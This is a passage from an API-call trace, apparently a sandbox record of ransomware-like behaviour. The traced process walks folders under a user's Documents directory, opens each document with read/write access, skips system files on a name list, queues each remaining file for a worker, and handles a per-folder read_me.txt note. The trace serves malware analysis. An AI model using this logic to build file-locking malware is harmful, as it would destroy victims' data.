HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr") returned 66 [0076.015] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e5db7d0, ftCreationTime.dwHighDateTime=0x1d4d099, ftLastAccessTime.dwLowDateTime=0x247fbfc0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x247fbfc0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PwtM6T", cAlternateFileName="")) returned 1 [0076.015] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\PwtM6T") returned 67 [0076.015] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe9b37f0, ftCreationTime.dwHighDateTime=0x1d4cb2c, ftLastAccessTime.dwLowDateTime=0xe4bc2ec0, ftLastAccessTime.dwHighDateTime=0x1d4cd76, ftLastWriteTime.dwLowDateTime=0xe4bc2ec0, ftLastWriteTime.dwHighDateTime=0x1d4cd76, nFileSizeHigh=0x0, nFileSizeLow=0x2acf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qlydpxKQGSEMlw.csv", cAlternateFileName="QLYDPX~1.CSV")) returned 1 [0076.015] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\qlydpxKQGSEMlw.csv") returned 79 [0076.015] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\qlydpxKQGSEMlw.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\qlydpxkqgsemlw.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x884 [0076.015] StrStrW (lpFirst="qlydpxkqgsemlw.csv", lpSrch="read_me.txt") returned 0x0 [0076.016] StrStrW (lpFirst="qlydpxkqgsemlw.csv", lpSrch="autoexec.bat") returned 0x0 [0076.016] StrStrW (lpFirst="qlydpxkqgsemlw.csv", lpSrch="desktop.ini") returned 0x0 [0076.016] StrStrW (lpFirst="qlydpxkqgsemlw.csv", lpSrch="autorun.inf") returned 0x0 [0076.016] StrStrW (lpFirst="qlydpxkqgsemlw.csv", lpSrch="ntuser.dat") returned 0x0 [0076.016] StrStrW (lpFirst="qlydpxkqgsemlw.csv", lpSrch="iconcache.db") returned 0x0 [0076.016] StrStrW (lpFirst="qlydpxkqgsemlw.csv", lpSrch="bootsect.bak") returned 0x0 [0076.016] StrStrW (lpFirst="qlydpxkqgsemlw.csv", lpSrch="boot.ini") returned 0x0 [0076.016] StrStrW (lpFirst="qlydpxkqgsemlw.csv", lpSrch="ntuser.dat.log") returned 0x0 [0076.016] StrStrW (lpFirst="qlydpxkqgsemlw.csv", lpSrch="thumbs.db") returned 0x0 [0076.016] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 66 [0076.016] QueueUserWorkItem (Function=0x404e00, Context=0x884, Flags=0x0) returned 1 [0076.016] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x247fbfc0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x247fbfc0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x247fbfc0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.016] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\read_me.txt") returned 72 [0076.016] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x888 [0076.016] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.016] CloseHandle (hObject=0x888) returned 1 [0076.016] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x169f30f0, ftCreationTime.dwHighDateTime=0x1d4cd7b, ftLastAccessTime.dwLowDateTime=0x397770, ftLastAccessTime.dwHighDateTime=0x1d4ce62, ftLastWriteTime.dwLowDateTime=0x397770, ftLastWriteTime.dwHighDateTime=0x1d4ce62, nFileSizeHigh=0x0, nFileSizeLow=0x157a9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tBy7vnJ20L.odt", cAlternateFileName="TBY7VN~1.ODT")) returned 1 [0076.016] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\tBy7vnJ20L.odt") returned 75 [0076.016] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\tBy7vnJ20L.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\tby7vnj20l.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x888 [0076.016] StrStrW (lpFirst="tby7vnj20l.odt", lpSrch="read_me.txt") returned 0x0 [0076.017] StrStrW (lpFirst="tby7vnj20l.odt", lpSrch="autoexec.bat") returned 0x0 [0076.017] StrStrW (lpFirst="tby7vnj20l.odt", lpSrch="desktop.ini") returned 0x0 [0076.017] StrStrW (lpFirst="tby7vnj20l.odt", lpSrch="autorun.inf") returned 0x0 [0076.017] StrStrW (lpFirst="tby7vnj20l.odt", lpSrch="ntuser.dat") returned 0x0 [0076.017] StrStrW (lpFirst="tby7vnj20l.odt", lpSrch="iconcache.db") returned 0x0 [0076.017] StrStrW (lpFirst="tby7vnj20l.odt", lpSrch="bootsect.bak") returned 0x0 [0076.017] StrStrW (lpFirst="tby7vnj20l.odt", lpSrch="boot.ini") returned 0x0 [0076.017] StrStrW (lpFirst="tby7vnj20l.odt", lpSrch="ntuser.dat.log") returned 0x0 [0076.017] StrStrW (lpFirst="tby7vnj20l.odt", lpSrch="thumbs.db") returned 0x0 [0076.017] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 67 [0076.017] QueueUserWorkItem (Function=0x404e00, Context=0x888, Flags=0x0) returned 1 [0076.017] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabc3a430, ftCreationTime.dwHighDateTime=0x1d4cd45, ftLastAccessTime.dwLowDateTime=0xc2aa53e0, ftLastAccessTime.dwHighDateTime=0x1d4d3b9, ftLastWriteTime.dwLowDateTime=0xc2aa53e0, ftLastWriteTime.dwHighDateTime=0x1d4d3b9, nFileSizeHigh=0x0, nFileSizeLow=0x129fa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_DYrqU5.xls", cAlternateFileName="")) returned 1 [0076.017] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\_DYrqU5.xls") returned 72 [0076.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\_DYrqU5.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\_dyrqu5.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88c [0076.017] StrStrW (lpFirst="_dyrqu5.xls", lpSrch="read_me.txt") returned 0x0 [0076.017] StrStrW (lpFirst="_dyrqu5.xls", lpSrch="autoexec.bat") returned 0x0 [0076.017] StrStrW (lpFirst="_dyrqu5.xls", lpSrch="desktop.ini") returned 0x0 [0076.017] StrStrW (lpFirst="_dyrqu5.xls", lpSrch="autorun.inf") returned 0x0 [0076.017] StrStrW (lpFirst="_dyrqu5.xls", lpSrch="ntuser.dat") returned 0x0 [0076.017] StrStrW (lpFirst="_dyrqu5.xls", lpSrch="iconcache.db") returned 0x0 [0076.017] StrStrW (lpFirst="_dyrqu5.xls", lpSrch="bootsect.bak") returned 0x0 [0076.017] StrStrW (lpFirst="_dyrqu5.xls", lpSrch="boot.ini") returned 0x0 [0076.017] StrStrW (lpFirst="_dyrqu5.xls", lpSrch="ntuser.dat.log") returned 0x0 [0076.017] StrStrW (lpFirst="_dyrqu5.xls", lpSrch="thumbs.db") returned 0x0 [0076.018] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 68 [0076.018] QueueUserWorkItem (Function=0x404e00, Context=0x88c, Flags=0x0) returned 1 [0076.018] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabc3a430, ftCreationTime.dwHighDateTime=0x1d4cd45, ftLastAccessTime.dwLowDateTime=0xc2aa53e0, ftLastAccessTime.dwHighDateTime=0x1d4d3b9, ftLastWriteTime.dwLowDateTime=0xc2aa53e0, ftLastWriteTime.dwHighDateTime=0x1d4d3b9, nFileSizeHigh=0x0, nFileSizeLow=0x129fa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_dyrqu5.xls", cAlternateFileName="")) returned 0 [0076.018] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.018] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\read_me.txt") returned 72 [0076.018] GetProcessHeap () returned 0x4f10000 [0076.018] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b800c8 | out: hHeap=0x4f10000) returned 1 [0076.018] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 45 [0076.018] GetProcessHeap () returned 0x4f10000 [0076.018] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b900d0 | out: hHeap=0x4f10000) returned 1 [0076.018] GetProcessHeap () returned 0x4f10000 [0076.018] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e31128 [0076.018] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\*") returned 83 [0076.018] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d22c910, ftCreationTime.dwHighDateTime=0x1d4cb02, ftLastAccessTime.dwLowDateTime=0x246cb4c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246cb4c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.018] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\.") returned 83 [0076.018] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d22c910, ftCreationTime.dwHighDateTime=0x1d4cb02, ftLastAccessTime.dwLowDateTime=0x246cb4c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246cb4c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.018] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\..") returned 84 [0076.018] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x765e31e0, ftCreationTime.dwHighDateTime=0x1d4cc58, ftLastAccessTime.dwLowDateTime=0xcc51b4d0, ftLastAccessTime.dwHighDateTime=0x1d4d1f0, ftLastWriteTime.dwLowDateTime=0xcc51b4d0, ftLastWriteTime.dwHighDateTime=0x1d4d1f0, nFileSizeHigh=0x0, nFileSizeLow=0x18f12, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bb1BK5wvdL X.odp", cAlternateFileName="BB1BK5~1.ODP")) returned 1 [0076.018] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\bb1BK5wvdL X.odp") returned 98 [0076.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\bb1BK5wvdL X.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\-qlf9qdmx0yqxmstexaw\\bb1bk5wvdl x.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x890 [0076.018] StrStrW (lpFirst="bb1bk5wvdl x.odp", lpSrch="read_me.txt") returned 0x0 [0076.018] StrStrW (lpFirst="bb1bk5wvdl x.odp", lpSrch="autoexec.bat") returned 0x0 [0076.018] StrStrW (lpFirst="bb1bk5wvdl x.odp", lpSrch="desktop.ini") returned 0x0 [0076.019] StrStrW (lpFirst="bb1bk5wvdl x.odp", lpSrch="autorun.inf") returned 0x0 [0076.019] StrStrW (lpFirst="bb1bk5wvdl x.odp", lpSrch="ntuser.dat") returned 0x0 [0076.019] StrStrW (lpFirst="bb1bk5wvdl x.odp", lpSrch="iconcache.db") returned 0x0 [0076.019] StrStrW (lpFirst="bb1bk5wvdl x.odp", lpSrch="bootsect.bak") returned 0x0 [0076.019] StrStrW (lpFirst="bb1bk5wvdl x.odp", lpSrch="boot.ini") returned 0x0 [0076.019] StrStrW (lpFirst="bb1bk5wvdl x.odp", lpSrch="ntuser.dat.log") returned 0x0 [0076.019] StrStrW (lpFirst="bb1bk5wvdl x.odp", lpSrch="thumbs.db") returned 0x0 [0076.019] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 69 [0076.019] QueueUserWorkItem (Function=0x404e00, Context=0x890, Flags=0x0) returned 1 [0076.019] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c66dde0, ftCreationTime.dwHighDateTime=0x1d4cf47, ftLastAccessTime.dwLowDateTime=0xcf39bf80, ftLastAccessTime.dwHighDateTime=0x1d4cb1f, ftLastWriteTime.dwLowDateTime=0xcf39bf80, ftLastWriteTime.dwHighDateTime=0x1d4cb1f, nFileSizeHigh=0x0, nFileSizeLow=0x15774, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bw-7fnZ.odp", cAlternateFileName="")) returned 1 [0076.019] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\bw-7fnZ.odp") returned 93 [0076.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\bw-7fnZ.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\-qlf9qdmx0yqxmstexaw\\bw-7fnz.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x894 [0076.019] StrStrW (lpFirst="bw-7fnz.odp", lpSrch="read_me.txt") returned 0x0 [0076.019] StrStrW (lpFirst="bw-7fnz.odp", lpSrch="autoexec.bat") returned 0x0 [0076.019] StrStrW (lpFirst="bw-7fnz.odp", lpSrch="desktop.ini") returned 0x0 [0076.019] StrStrW (lpFirst="bw-7fnz.odp", lpSrch="autorun.inf") returned 0x0 [0076.019] StrStrW (lpFirst="bw-7fnz.odp", lpSrch="ntuser.dat") returned 0x0 [0076.019] StrStrW (lpFirst="bw-7fnz.odp", lpSrch="iconcache.db") returned 0x0 [0076.019] StrStrW (lpFirst="bw-7fnz.odp", lpSrch="bootsect.bak") returned 0x0 [0076.019] StrStrW (lpFirst="bw-7fnz.odp", lpSrch="boot.ini") returned 0x0 [0076.019] StrStrW (lpFirst="bw-7fnz.odp", lpSrch="ntuser.dat.log") returned 0x0 [0076.019] StrStrW (lpFirst="bw-7fnz.odp", lpSrch="thumbs.db") returned 0x0 [0076.020] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 70 [0076.020] QueueUserWorkItem (Function=0x404e00, Context=0x894, Flags=0x0) returned 1 [0076.020] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e98c640, ftCreationTime.dwHighDateTime=0x1d4d08b, ftLastAccessTime.dwLowDateTime=0x53a8df70, ftLastAccessTime.dwHighDateTime=0x1d4c9a5, ftLastWriteTime.dwLowDateTime=0x53a8df70, ftLastWriteTime.dwHighDateTime=0x1d4c9a5, nFileSizeHigh=0x0, nFileSizeLow=0x1b1a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="E77BCsVsDojphSy.ppt", cAlternateFileName="E77BCS~1.PPT")) returned 1 [0076.020] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\E77BCsVsDojphSy.ppt") returned 101 [0076.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\E77BCsVsDojphSy.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\-qlf9qdmx0yqxmstexaw\\e77bcsvsdojphsy.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x898 [0076.020] StrStrW (lpFirst="e77bcsvsdojphsy.ppt", lpSrch="read_me.txt") returned 0x0 [0076.020] StrStrW (lpFirst="e77bcsvsdojphsy.ppt", lpSrch="autoexec.bat") returned 0x0 [0076.020] StrStrW (lpFirst="e77bcsvsdojphsy.ppt", lpSrch="desktop.ini") returned 0x0 [0076.020] StrStrW (lpFirst="e77bcsvsdojphsy.ppt", lpSrch="autorun.inf") returned 0x0 [0076.020] StrStrW (lpFirst="e77bcsvsdojphsy.ppt", lpSrch="ntuser.dat") returned 0x0 [0076.020] StrStrW (lpFirst="e77bcsvsdojphsy.ppt", lpSrch="iconcache.db") returned 0x0 [0076.020] StrStrW (lpFirst="e77bcsvsdojphsy.ppt", lpSrch="bootsect.bak") returned 0x0 [0076.020] StrStrW (lpFirst="e77bcsvsdojphsy.ppt", lpSrch="boot.ini") returned 0x0 [0076.020] StrStrW (lpFirst="e77bcsvsdojphsy.ppt", lpSrch="ntuser.dat.log") returned 0x0 [0076.020] StrStrW (lpFirst="e77bcsvsdojphsy.ppt", lpSrch="thumbs.db") returned 0x0 [0076.020] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 71 [0076.020] QueueUserWorkItem (Function=0x404e00, Context=0x898, Flags=0x0) returned 1 [0076.020] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x246cb4c0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x246cb4c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246cb4c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.020] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\read_me.txt") returned 93 [0076.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\-qlf9qdmx0yqxmstexaw\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x89c [0076.020] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.020] CloseHandle (hObject=0x89c) returned 1 [0076.021] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe66f0b20, ftCreationTime.dwHighDateTime=0x1d4d1e5, ftLastAccessTime.dwLowDateTime=0xf995e4c0, ftLastAccessTime.dwHighDateTime=0x1d4d358, ftLastWriteTime.dwLowDateTime=0xf995e4c0, ftLastWriteTime.dwHighDateTime=0x1d4d358, nFileSizeHigh=0x0, nFileSizeLow=0x90dc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rePTuEhAK.ots", cAlternateFileName="REPTUE~1.OTS")) returned 1 [0076.021] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\rePTuEhAK.ots") returned 95 [0076.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\rePTuEhAK.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\-qlf9qdmx0yqxmstexaw\\reptuehak.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x89c [0076.021] StrStrW (lpFirst="reptuehak.ots", lpSrch="read_me.txt") returned 0x0 [0076.021] StrStrW (lpFirst="reptuehak.ots", lpSrch="autoexec.bat") returned 0x0 [0076.021] StrStrW (lpFirst="reptuehak.ots", lpSrch="desktop.ini") returned 0x0 [0076.021] StrStrW (lpFirst="reptuehak.ots", lpSrch="autorun.inf") returned 0x0 [0076.021] StrStrW (lpFirst="reptuehak.ots", lpSrch="ntuser.dat") returned 0x0 [0076.021] StrStrW (lpFirst="reptuehak.ots", lpSrch="iconcache.db") returned 0x0 [0076.021] StrStrW (lpFirst="reptuehak.ots", lpSrch="bootsect.bak") returned 0x0 [0076.021] StrStrW (lpFirst="reptuehak.ots", lpSrch="boot.ini") returned 0x0 [0076.021] StrStrW (lpFirst="reptuehak.ots", lpSrch="ntuser.dat.log") returned 0x0 [0076.021] StrStrW (lpFirst="reptuehak.ots", lpSrch="thumbs.db") returned 0x0 [0076.021] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 72 [0076.021] QueueUserWorkItem (Function=0x404e00, Context=0x89c, Flags=0x0) returned 1 [0076.021] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83e469f0, ftCreationTime.dwHighDateTime=0x1d4c5c9, ftLastAccessTime.dwLowDateTime=0xce3437b0, ftLastAccessTime.dwHighDateTime=0x1d4cc22, ftLastWriteTime.dwLowDateTime=0xce3437b0, ftLastWriteTime.dwHighDateTime=0x1d4cc22, nFileSizeHigh=0x0, nFileSizeLow=0x17f8a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R_P0TZ.rtf", cAlternateFileName="")) returned 1 [0076.021] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\R_P0TZ.rtf") returned 92 [0076.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\R_P0TZ.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\-qlf9qdmx0yqxmstexaw\\r_p0tz.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8a0 [0076.021] StrStrW (lpFirst="r_p0tz.rtf", lpSrch="read_me.txt") returned 0x0 [0076.021] StrStrW (lpFirst="r_p0tz.rtf", lpSrch="autoexec.bat") returned 0x0 [0076.021] StrStrW (lpFirst="r_p0tz.rtf", lpSrch="desktop.ini") returned 0x0 [0076.021] StrStrW (lpFirst="r_p0tz.rtf", lpSrch="autorun.inf") returned 0x0 [0076.022] StrStrW (lpFirst="r_p0tz.rtf", lpSrch="ntuser.dat") returned 0x0 [0076.022] StrStrW (lpFirst="r_p0tz.rtf", lpSrch="iconcache.db") returned 0x0 [0076.022] StrStrW (lpFirst="r_p0tz.rtf", lpSrch="bootsect.bak") returned 0x0 [0076.022] StrStrW (lpFirst="r_p0tz.rtf", lpSrch="boot.ini") returned 0x0 [0076.022] StrStrW (lpFirst="r_p0tz.rtf", lpSrch="ntuser.dat.log") returned 0x0 [0076.022] StrStrW (lpFirst="r_p0tz.rtf", lpSrch="thumbs.db") returned 0x0 [0076.022] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 73 [0076.022] QueueUserWorkItem (Function=0x404e00, 